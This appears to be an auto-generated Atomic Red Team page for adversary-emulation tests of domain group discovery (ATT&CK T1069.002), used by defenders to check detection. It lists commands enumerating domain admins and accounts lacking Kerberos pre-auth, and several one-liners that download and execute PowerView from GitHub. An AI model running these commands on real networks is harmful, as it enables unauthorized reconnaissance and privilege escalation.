CircleCI Atomic Red Team doc generator
8.3 KiB
T1069.002 - Domain Groups
Description from ATT&CK
Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.Commands such as
net group /domainof the Net utility,dscacheutil -q groupon macOS, andldapsearchon Linux can list domain-level groups.
Atomic Tests
-
Atomic Test #1 - Basic Permission Groups Discovery Windows (Domain)
-
Atomic Test #2 - Permission Groups Discovery PowerShell (Domain)
-
Atomic Test #3 - Elevated group enumeration using net group (Domain)
-
Atomic Test #4 - Find machines where user has local admin access (PowerView)
-
Atomic Test #5 - Find local admins on all machines in domain (PowerView)
-
Atomic Test #6 - Find Local Admins via Group Policy (PowerView)
-
Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast)
Atomic Test #1 - Basic Permission Groups Discovery Windows (Domain)
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
Supported Platforms: Windows
auto_generated_guid: dd66d77d-8998-48c0-8024-df263dc2ce5d
Attack Commands: Run with command_prompt!
net localgroup
net group /domain
net group "domain admins" /domain
net group "enterprise admins" /domain
Atomic Test #2 - Permission Groups Discovery PowerShell (Domain)
Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
Supported Platforms: Windows
auto_generated_guid: 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| user | User to identify what groups a user is a member of | String | administrator |
Attack Commands: Run with powershell!
get-ADPrincipalGroupMembership #{user} | select name
Atomic Test #3 - Elevated group enumeration using net group (Domain)
Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
Supported Platforms: Windows
auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37
Attack Commands: Run with command_prompt!
net group /domai "Domain Admins"
net groups "Account Operators" /doma
net groups "Exchange Organization Management" /doma
net group "BUILTIN\Backup Operators" /doma
Atomic Test #4 - Find machines where user has local admin access (PowerView)
Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.
Supported Platforms: Windows
auto_generated_guid: a2d71eee-a353-4232-9f86-54f4288dd8c1
Attack Commands: Run with powershell!
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose
Atomic Test #5 - Find local admins on all machines in domain (PowerView)
Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed.
Supported Platforms: Windows
auto_generated_guid: a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd
Attack Commands: Run with powershell!
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose
Atomic Test #6 - Find Local Admins via Group Policy (PowerView)
takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed.
Supported Platforms: Windows
auto_generated_guid: 64fdb43b-5259-467a-b000-1b02c00e510a
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| computer_name | hostname of the computer to analyze | Path | $env:COMPUTERNAME |
Attack Commands: Run with powershell!
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast)
When successful, accounts that do not require kerberos pre-auth will be returned
Supported Platforms: Windows
auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b
Attack Commands: Run with powershell!
get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}
Dependencies: Run with powershell!
Description: Computer must be domain joined.
Check Prereq Commands:
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
Get Prereq Commands:
Write-Host Joining this computer to a domain must be done manually.
Description: Requires the Active Directory module for powershell to be installed.
Check Prereq Commands:
if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
Get Prereq Commands:
Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
Atomic Test #8 - Adfind - Query Active Directory Groups
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Groups reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Supported Platforms: Windows
auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe |
Attack Commands: Run with command_prompt!
#{adfind_path} -f (objectcategory=group)
Dependencies: Run with powershell!
Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
Check Prereq Commands:
if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
Get Prereq Commands:
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}